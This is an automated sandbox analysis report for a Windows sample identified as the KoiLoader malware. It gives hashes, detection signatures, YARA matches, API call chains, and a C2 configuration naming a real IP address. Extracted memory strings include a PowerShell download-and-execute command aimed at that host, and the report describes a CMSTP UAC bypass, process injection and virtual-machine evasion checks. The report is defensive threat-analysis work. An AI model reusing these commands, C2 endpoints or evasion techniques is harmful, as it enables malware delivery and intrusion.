Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
Analysis ID:1541791
MD5:9e70e823876c7e83bf254d1f8fcbb3e5
SHA1:dba226d7c283e53478e3f0b02b1ec8a8260dea57
SHA256:fe75dacf62cfc6a628f60b49a8c670c55d3ab06ec825ea7d35b132bc8951626e
Tags:exe
Infos:

Detection

KoiLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cleanup
{"C2": "http://217.195.153.196/academy.php", "Payload url": "http://217.195.153.196/assets"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
    00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
        00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376JoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
              0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
                  0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x1808:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x9bd6:$s1: CoGetObject
                    Click to see the 3 entries
                    No Sigma rule has matched
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeAvira: detected
                    Source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: KoiLoader {"C2": "http://217.195.153.196/academy.php", "Payload url": "http://217.195.153.196/assets"}
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeVirustotal: Detection: 78%Perma Link
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeReversingLabs: Detection: 79%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010992B0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_010992B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010986B4 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,0_2_010986B4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010986D0 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_010986D0

                    Exploits

                    barindex
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010972C0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize,0_2_010972C0

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_0015993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0015993E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_010989B0

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: http://217.195.153.196/academy.php
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01097550 inet_pton,htons,socket,GetProcessHeap,connect,recv,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,GetProcessHeap,recv,closesocket,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,0_2_01097550
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeString found in binary or memory: http://217.195.153.196/academy.php
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://217.195.153.196/academy.php%temp%
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeString found in binary or memory: http://217.195.153.196/assets
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://217.195.153.196/assets/c

                    System Summary

                    barindex
                    Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01095C50 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_01095C50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01095FB0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_01095FB0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_0015FBC10_2_0015FBC1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010989B00_2_010989B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010943B00_2_010943B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010947B00_2_010947B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01097BF00_2_01097BF0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010926900_2_01092690
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010976F00_2_010976F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: String function: 001550E0 appears 33 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: String function: 00153CE0 appears 82 times
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@1/0@0/0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01096350 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_01096350
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01096D30 wnsprintfW,ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,0_2_01096D30
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeVirustotal: Detection: 78%
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeReversingLabs: Detection: 79%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeSection loaded: uxtheme.dllJump to behavior
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1090000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe.1241c70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe PID: 7376, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_00151300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00151300
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_001602D1 push ecx; ret 0_2_001602E4

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_010989B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_010989B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-12381
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeFile opened / queried: C:\Windows\System32\VBoxService.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeAPI coverage: 9.5 %
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_0015993E FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0015993E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_010989B0
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeBinary or memory string: Hyper-V
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: POST%s|%s|4jdmhuQIStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://217.195.153.196/academy.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1http://217.195.153.196/assets/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeBinary or memory string: %systemroot%\System32\VBoxService.exe
                    Source: SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeBinary or memory string: %systemroot%\System32\VBoxTray.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeAPI call chain: ExitProcess graph end nodegraph_0-12384
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeAPI call chain: ExitProcess graph end nodegraph_0-11542
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_00154E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00154E89
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_00151300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00151300
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_00151710 mov ecx, dword ptr fs:[00000030h]0_2_00151710
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01097900 mov eax, dword ptr fs:[00000030h]0_2_01097900
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01095FB0 mov eax, dword ptr fs:[00000030h]0_2_01095FB0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_0015B779 GetProcessHeap,0_2_0015B779
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_00155016 SetUnhandledExceptionFilter,0_2_00155016
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_001549BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001549BE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_00154E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00154E89
